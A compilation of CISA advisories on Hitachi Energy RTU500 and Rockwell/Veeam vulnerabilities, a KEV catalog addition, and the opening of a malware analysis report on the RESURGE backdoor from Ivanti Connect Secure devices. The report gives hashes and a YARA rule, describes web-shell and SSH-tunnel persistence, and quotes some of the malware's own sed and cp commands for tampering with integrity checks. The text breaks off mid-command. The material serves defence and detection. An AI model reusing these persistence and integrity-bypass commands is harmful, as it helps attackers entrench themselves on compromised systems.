A CVSS v4 score has also been calculated for CVE-2025-1445. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Energy
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER
Hitachi Energy reported these vulnerabilities to CISA.
4. MITIGATIONS
Hitachi Energy has identified the following specific workarounds and mitigations users can apply to reduce risk:

For all versions, apply general mitigation factors/workarounds. Upgrade the system once remediated version is available, or apply general mitigation factors.
RTU500 series CMU 12.0.1 – 12.0.14, 12.2.1 – 12.2.12, 12.4.1 – 12.4.11, 12.6.1 – 12.6.10, 12.7.1 – 12.7.7: Update to version 12.7.8 when available.
RTU500 series CMU version 13.2.1 – 13.2.7, 13.4.1 – 13.4.4, 13.5.1 – 13.5.3, 13.6.1: Update to version 13.7.1
RTU500 series CMU 13.5.1 – 13.5.3: Update to version 13.5.4 when available.
RTU500 series CMU 13.6.1: Update to version 13.6.2 when available.
(CVE-2024-11499, CVE-2025-1445) RTU500 series CMU 13.7.1 – 13.7.4: Update to version 13.7.6 when available.
(CVE-2024-12169) RTU500 series CMU 13.4.1 – 13.4.4, 13.5.1 – 13.5.3, 13.6.1, 13.7.1 – 13.7.4: Update to version 13.7.6 when available.

For more information see the associated Hitachi Energy PSIRT security advisory 8DBD000207 Cybersecurity Advisory – Multiple Denial-of-Service Vulnerabilities in Hitachi Energy’s RTU500 Series Product.
Hitachi Energy recommends users implement recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
5. UPDATE HISTORY

April 3, 2025: Initial Republication of Hitachi Energy 8DBD000207 

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 8.7
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: Hitachi Energy
  • Equipment: RTU500 series
  • Vulnerabilities: Null Pointer Dereference, Insufficient Resource Pool, Missing Synchronization

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to cause a denial-of-service condition.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following Hitachi Energy products are affected:

  • RTU500 series CMU: Versions 12.0.1 – 12.0.14 (CVE-2024-10037)
  • RTU500 series CMU: Versions 12.2.1 – 12.2.12 (CVE-2024-10037)
  • RTU500 series CMU: Versions 12.4.1 – 12.4.11 (CVE-2024-10037)
  • RTU500 series CMU: Versions 12.6.1 – 12.6.10 (CVE-2024-10037)
  • RTU500 series CMU: Versions 12.7.1 – 12.7.7 (CVE-2024-10037)
  • RTU500 series CMU: Versions 13.2.1 – 13.2.7 (CVE-2024-10037)
  • RTU500 series CMU: Versions 13.4.1 – 13.4.4 (CVE-2024-10037, CVE-2024-11499, CVE-2024-12169)
  • RTU500 series CMU: Versions 13.5.1 – 13.5.3 (CVE-2024-10037, CVE-2024-11499, CVE-2024-12169)
  • RTU500 series CMU: Versions 13.6.1 (CVE-2024-10037, CVE-2024-11499, CVE-2024-12169)
  • RTU500 series CMU: Versions 13.7.1 (CVE-2024-11499)
  • RTU500 series CMU: Versions 13.7.1 – 13.7.4 (CVE-2024-12169, CVE-2025-1445)

3.2 VULNERABILITY OVERVIEW

3.2.1 NULL POINTER DEREFERENCE CWE-476

A vulnerability exists in the RTU500 web server component that can cause a denial of service to the RTU500 CMU application if a specially crafted message sequence is executed on a WebSocket connection. An attacker must be properly authenticated and the test mode function of RTU500 must be enabled to exploit this vulnerability. The affected CMU will automatically recover itself if an attacker successfully exploits this vulnerability.

CVE-2024-10037 has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

A CVSS v4 score has also been calculated for CVE-2024-10037. A base score of 5.9 has been calculated; the CVSS vector string is (AV:N/AC:H/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).

3.2.2 NULL POINTER DEREFERENCE CWE-476

A vulnerability exists in RTU500 IEC 60870-4-104 controlled station functionality, that allows an authenticated and authorized attacker to perform a CMU re-start. The vulnerability can be triggered if certificates are updated while in use on active connections. The affected CMU will automatically recover itself if an attacker successfully exploits this vulnerability.

CVE-2024-11499 has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

A CVSS v4 score has also been calculated for CVE-2024-11499. A base score of 6.9 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).

3.2.3 INSUFFICIENT RESOURCE POOL CWE-410

A vulnerability exists in RTU500 IEC 60870-5-104 controlled station functionality and IEC 61850 functionality, that allows an attacker performing a specific attack sequence to restart the affected CMU. This vulnerability only applies, if secure communication using IEC 62351-3 (TLS) is enabled.

CVE-2024-12169 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).

A CVSS v4 score has also been calculated for CVE-2024-12169. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).

3.2.4 MISSING SYNCHRONIZATION CWE-820

A vulnerability exists in RTU IEC 61850 client and server functionality that could impact the availability if renegotiation of an open IEC61850 TLS connection takes place in specific timing situations, when IEC61850 communication is active. Precondition is that IEC61850 as client or server are configured using TLS on RTU500 device. It affects the CMU the IEC61850 stack is configured on.

CVE-2025-1445 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

A CVSS v4 score has also been calculated for CVE-2025-1445. A base score of 8.7 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Energy
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER

Hitachi Energy reported these vulnerabilities to CISA.

4. MITIGATIONS

Hitachi Energy has identified the following specific workarounds and mitigations users can apply to reduce risk:

  • For all versions, apply general mitigation factors/workarounds. Upgrade the system once remediated version is available, or apply general mitigation factors.
  • RTU500 series CMU 12.0.1 – 12.0.14, 12.2.1 – 12.2.12, 12.4.1 – 12.4.11, 12.6.1 – 12.6.10, 12.7.1 – 12.7.7: Update to version 12.7.8 when available.
  • RTU500 series CMU version 13.2.1 – 13.2.7, 13.4.1 – 13.4.4, 13.5.1 – 13.5.3, 13.6.1: Update to version 13.7.1
  • RTU500 series CMU 13.5.1 – 13.5.3: Update to version 13.5.4 when available.
  • RTU500 series CMU 13.6.1: Update to version 13.6.2 when available.
  • (CVE-2024-11499, CVE-2025-1445) RTU500 series CMU 13.7.1 – 13.7.4: Update to version 13.7.6 when available.
  • (CVE-2024-12169) RTU500 series CMU 13.4.1 – 13.4.4, 13.5.1 – 13.5.3, 13.6.1, 13.7.1 – 13.7.4: Update to version 13.7.6 when available.

For more information see the associated Hitachi Energy PSIRT security advisory 8DBD000207 Cybersecurity Advisory – Multiple Denial-of-Service Vulnerabilities in Hitachi Energy’s RTU500 Series Product.

Hitachi Energy recommends users implement recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.

CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

5. UPDATE HISTORY

  • April 3, 2025: Initial Republication of Hitachi Energy 8DBD000207

 Read More

Rockwell Automation Lifecycle Services with Veeam Backup and Replication

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v4 9.4
ATTENTION: Exploitable remotely/low attack complexity
Vendor: Rockwell Automation
Equipment: Lifecycle Services with Veeam Backup and Replication
Vulnerability: Deserialization of Untrusted Data

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker with administrative privileges to execute code on the target system.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Rockwell Automation reports the following Lifecycle Services with Veeam Backup and Replication are affected:

Industrial Data Center (IDC) with Veeam: Generations 1 – 5
VersaVirtual Appliance (VVA) with Veeam: Series A – C

3.2 VULNERABILITY OVERVIEW
3.2.1 DESERIALIZATION OF UNTRUSTED DATA CWE-502
A remote code execution vulnerability exists in Veeam Backup and Replication, which the affected products use. Exploitation of the vulnerability can allow a threat actor to execute code on the target system.
CVE-2025-23120 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.9 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-23120. A base score of 9.4 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER
Rockwell Automation reported this vulnerability to CISA.
4. MITIGATIONS
Users with an active Rockwell Automation Infrastructure Managed Service contract:

Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without Rockwell Automation managed services contract, refer to Veeam’s advisories below:

Support Content Notification – Support Portal – Veeam support portal
Veeam Backup & Replication CVE-2025-23120

Additionally, users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices where possible.
For more information refer to Rockwell Automation’s security advisory.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls and isolating them from business networks.
When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Do not click web links or open attachments in unsolicited email messages.
Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
5. UPDATE HISTORY

April 1, 2025: Initial Republication of Rockwell Automation SD1724 

View CSAF

1. EXECUTIVE SUMMARY

  • CVSS v4 9.4
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: Rockwell Automation
  • Equipment: Lifecycle Services with Veeam Backup and Replication
  • Vulnerability: Deserialization of Untrusted Data

2. RISK EVALUATION

Successful exploitation of this vulnerability could allow an attacker with administrative privileges to execute code on the target system.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Rockwell Automation reports the following Lifecycle Services with Veeam Backup and Replication are affected:

  • Industrial Data Center (IDC) with Veeam: Generations 1 – 5
  • VersaVirtual Appliance (VVA) with Veeam: Series A – C

3.2 VULNERABILITY OVERVIEW

3.2.1 DESERIALIZATION OF UNTRUSTED DATA CWE-502

A remote code execution vulnerability exists in Veeam Backup and Replication, which the affected products use. Exploitation of the vulnerability can allow a threat actor to execute code on the target system.

CVE-2025-23120 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.9 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).

A CVSS v4 score has also been calculated for CVE-2025-23120. A base score of 9.4 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER

Rockwell Automation reported this vulnerability to CISA.

4. MITIGATIONS

Users with an active Rockwell Automation Infrastructure Managed Service contract:

  • Rockwell Automation will contact impacted users to discuss actions needed for remediation efforts.

Users without Rockwell Automation managed services contract, refer to Veeam’s advisories below:

Additionally, users of the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices where possible.

For more information refer to Rockwell Automation’s security advisory.

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:

  • Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls and isolating them from business networks.
  • When remote access is required, use more secure methods, such as virtual private networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

5. UPDATE HISTORY

  • April 1, 2025: Initial Republication of Rockwell Automation SD1724

 Read More

CISA Adds One Known Exploited Vulnerability to Catalog

 ​CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

CVE-2024-20439 Cisco Smart Licensing Utility Static Credential Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria. 

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-20439 Cisco Smart Licensing Utility Static Credential Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

 Read More

CISA Releases Malware Analysis Report on RESURGE Malware Associated with Ivanti Connect Secure

 ​CISA has published a Malware Analysis Report (MAR) with analysis and associated detection signatures on a new malware variant CISA has identified as RESURGE. RESURGE contains capabilities of the SPAWNCHIMERA[1] malware variant, including surviving reboots; however, RESURGE contains distinctive commands that alter its behavior. These commands: 

Create a web shell, manipulate integrity checks, and modify files. 

Enable the use of web shells for credential harvesting, account creation, password resets, and escalating permissions. 

Copy the web shell to the Ivanti running boot disk and manipulate the running coreboot image. 

RESURGE is associated with the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. CVE-2025-0282 is a stack-based buffer overflow vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways. CISA added CVE-2025-0282 to its Known Exploited Vulnerabilities Catalog on January 8, 2025.  

For more information on the abovementioned malware variants and YARA rules for detection, see: MAR-25993211.R1.V1.CLEAR.
For a downloadable copy of the SIGMA rule associated with this MAR, see: AR25-087A SIGMA YAML.

CISA urges users and administrators to implement the following actions in addition to the Mitigation Instructions for CVE-2025-0282: 

For the highest level of confidence, conduct a factory reset.

For Cloud and Virtual systems, conduct a factory reset using an external known clean image of the device. 

See Ivanti’s Recommended Recovery Steps for more information, including how to conduct a factory reset. 

Reset credentials of privileged and non-privileged accounts.  

Reset passwords for all domain users and all local accounts, such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. The krbtgt account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The krbtgt account should be reset twice because the account has a two-password history. The first account reset for the krbtgt needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA’s Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise for more information. Although tailored to Federal Civilian Executive Branch (FCEB) agencies compromised in the 2020 SolarWinds Orion supply chain compromise, the steps are applicable to organizations with Windows AD compromise. 

Review access policies to temporarily revoke privileges/access for affected devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to “contain” them. 

Reset the relevant account credentials or access keys if the investigation finds the threat actor’s access is limited to non-elevated permissions. 

Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access. 

Organizations should report incidents and anomalous activity related to information found in the malware analysis report to CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870. Malware submissions can be made directly to Malware Nextgen at https://malware.cisa.gov. 

See the following resources for more guidance: 

Ivanti: Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (CVE-2025-0282, CVE-2025-0283)  

CISA has published a Malware Analysis Report (MAR) with analysis and associated detection signatures on a new malware variant CISA has identified as RESURGE. RESURGE contains capabilities of the SPAWNCHIMERA[1] malware variant, including surviving reboots; however, RESURGE contains distinctive commands that alter its behavior. These commands: 

  • Create a web shell, manipulate integrity checks, and modify files. 
  • Enable the use of web shells for credential harvesting, account creation, password resets, and escalating permissions. 
  • Copy the web shell to the Ivanti running boot disk and manipulate the running coreboot image. 

RESURGE is associated with the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. CVE-2025-0282 is a stack-based buffer overflow vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways. CISA added CVE-2025-0282 to its Known Exploited Vulnerabilities Catalog on January 8, 2025.  

For more information on the abovementioned malware variants and YARA rules for detection, see: MAR-25993211.R1.V1.CLEAR.

For a downloadable copy of the SIGMA rule associated with this MAR, see: AR25-087A SIGMA YAML.

CISA urges users and administrators to implement the following actions in addition to the Mitigation Instructions for CVE-2025-0282

  • For the highest level of confidence, conduct a factory reset.
    • For Cloud and Virtual systems, conduct a factory reset using an external known clean image of the device. 
  • Reset credentials of privileged and non-privileged accounts.  
  • Reset passwords for all domain users and all local accounts, such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. The krbtgt account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The krbtgt account should be reset twice because the account has a two-password history. The first account reset for the krbtgt needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA’s Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise for more information. Although tailored to Federal Civilian Executive Branch (FCEB) agencies compromised in the 2020 SolarWinds Orion supply chain compromise, the steps are applicable to organizations with Windows AD compromise. 
  • Review access policies to temporarily revoke privileges/access for affected devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to “contain” them. 
  • Reset the relevant account credentials or access keys if the investigation finds the threat actor’s access is limited to non-elevated permissions. 
  • Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access. 

Organizations should report incidents and anomalous activity related to information found in the malware analysis report to CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870. Malware submissions can be made directly to Malware Nextgen at https://malware.cisa.gov

See the following resources for more guidance: 

 Read More

MAR-25993211-r1.v1 Ivanti Connect Secure (RESURGE)

 ​Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:CLEAR–Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description
CISA analyzed three files obtained from a critical infrastructure’s Ivanti Connect Secure device after threat actors exploited Ivanti CVE-2025-0282 for initial access. One file—that CISA is calling RESURGE—has functionality similar to SPAWNCHIMERA in how it creates a Secure Shell (SSH) tunnel for command and control (C2). RESURGE also contains a series of commands that can modify files, manipulate integrity checks, and create a web shell that is copied to the running Ivanti boot disk. The second file is a variant of SPAWNSLOTH, that was contained within the RESURGE sample. The file tampers with the Ivanti device logs. The third file is a custom embedded binary that contains an open-source shell script and a subset of applets from the open-source tool BusyBox. The open-source shell script allows for ability to extract an uncompressed kernel image (vmlinux) from a compromised kernel image. BusyBox enables threat actors to perform various functions such as download and execute payloads on compromised devices. For information on CVE-2025-0282, see CISA Alert CISA Releases Malware Analysis Report on RESURGE Malware Associated with Ivanti Connect Secure.
Download the PDF version of this report:

AR25-087A MAR-25993211-r1.v1 Ivanti Connect Secure (RESURGE)
(PDF, 1.33 MB
)

For a downloadable copy of IOCs associated with this MAR, see:

AR25-087A STIX JSON
(JSON, 52.23 KB
)

 
Submitted Files (2)
52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda (libdsupgrade.so)b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d (dsmain)
Additional Files (1)
3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104 (liblogblock.so)

Findings

52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda
Tags
backdoor dropper rootkit
Details

Name
libdsupgrade.so

Size
1414480 bytes

Type
ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.16, stripped

MD5
cfb263a731d51ff489168bbca0d3bd2f

SHA1
87bcbbcb878aeee6ad4463464745770e95c6a937

SHA256
52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda

SHA512
3d12fdb707c188eb2e94cbf2dd42a50cfe343128652bab9245a54b887e35bc32c6a88c8faa5001a045df3991b387fcd6a27719ecbf84f6ce893163b040c2e0dd

ssdeep
24576:h6j7Ed+iowSCstJtmOKSbqUmtzYxs7X0ToN8fp/AQClBka:h4wSC0JtmpntzYMU2

Entropy
6.171523

Antivirus

ESET
a variant of Linux/SpawnSnail.A trojan

YARA Rules

rule CISA_25993211_01 : RESURGE backdoor dropper rootkit bootkit {meta:    author = “CISA Code & Media Analysis”    incident = “25993211”    date = “2025-03-03”    last_modified = “20250303_1446”    actor = “n/a”    family = “SPAWN”    capabilities = “n/a”    malware_type = “backdoor dropper rootkit bootkit”    tool_type = “unknown”    description = “Detects RESURGE malware samples”    sha256_1 = “52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda”strings:    $s1 = “snprintf”    $s2 = “CGI::param”    $s3 = “coreboot.img”     $s4 = “scanner.py”     $s5 = { 6C 6F 67 73 }    $s6 = “accept”    $s7 = “strncpy”    $s8 = “dsmdm”     $s9 = “funchook_create”     $s10 = { 20 83 B8 ED }condition:    all of them} 

ssdeep Matches
No matches found.
Relationships

52bbc44eb4…
Contains
3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104

Description
The file ‘libdsupgrade.so’ is a malicious 32-bit Linux Shared Object file that was extracted from an Ivanti Connect Secure device version 22.7.4.30859. The file contains capabilities of a rootkit, dropper, backdoor, bootkit, proxy, and tunneler. The file shares similar functionality to SPAWNCHIMERA malware however, this file contains a series of commands that modify files, manipulates integrity checks, and creates a web shell that is copied to the running Ivanti boot disk. CISA is calling this variant RESURGE. The similarities to SPAWNCHIMERA are as follows. RESURGE checks if the file is loaded by a program called ‘web’ or ‘dsmdm’ (Figure 1). If the ‘web’ program is called, it hooks accept and strncpy. It contains an embedded private key, which is Exclusive Or (XOR) encrypted, so the Threat Actor (TA) can connect to it with their public key. This proxy does not use encryption, it uses the decoding function (Figure 2). It uses tunneling to look for an Internet Protocol (IP) and data and decodes the data received which will then be funneled through the proxy. The hooked strncpy is modified to limit the copied data to 256 bytes. This is achieved by checking the web program is running within a specified address range, the bytes are not larger than 256, and the bytes do not begin with a specific byte pattern (Figure 3). The TA connects to the tunneler, which can also communicate with the file ‘me/runtime/tmp/.logsrv’. When it receives traffic it will funnel to the file, where the TA can then communicate with the system via a secure shell. If the ‘dsmdm’ program is called, it creates a thread for a secure shell via SSH to the system. It doesn’t bind to a port but rather binds to a file called ‘me/runtime/tmp/.logsrv’ and listens for connections, giving the TA a secure socket shell to the system (Figure 4). In order for the TA to access the shell, they need to access the file. Another thread is also created to drop the file ‘liblogblock.so’ to the ‘/tmp’ directory. It creates a handle to the ‘proc’ folder, enumerating through it looking for the ‘dslogserver’ process. It interacts with ‘dslogserver’ through shared memory to read from or write to the memory it is using. It checks whether the dslogserver is up. If not, it sleeps for 10 seconds and then checks again. This behavior continues in a loop until the server is detected, at which time it will try to load a shared object file called ‘/tmp/.liblogblock.so’ (Figure 5). RESURGE contains a series of commands that have been broken down and perform the following functionality: Commands 1: Inserts itself into ‘ld.so.preload’, sets up a web shell for remote command execution within the ‘compcheckresult.cgi’ file, fakes integrity checks, and generates keys against the modified files to sign the manifest file so they appear legitimate (Figure 6). Commands 2: Decrypts, modifies, and re-encrypts coreboot Random Access Memory (RAM) disk (Figure 7). Commands 3: Uses system() to execute several sed commands. These commands modify the contents of two Python files (‘scanner.py’ and ‘scanner_legacy.py’) by searching for particular lines and replacing them with new one which, if successful, will result in the scanning scripts no longer keeping track of mismatches or new files (Figure 8). —Begin Commands 1— /bin/sed -i ‘/echo_console “Saving package”/i    -Searches for the string echo_console “Saving package” and enters the following commands before it: cp /lib/%s /tmp/data/root/lib    -Copies itself to ‘/tmp/data/root/lib’.     cp /home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg /tmp/data/root/home/venv3/lib/python3.6/site-packages/scanner-0.1- py3.6.egg    -Copies a Python package ‘scanner-0.1-py3.6.egg’ to /tmp/data/root/home/venv3/lib/…. echo “/lib/%s “`/home/bin/openssl dgst -sha256 /lib/%s|cut -d ” “-f 2` b” >> 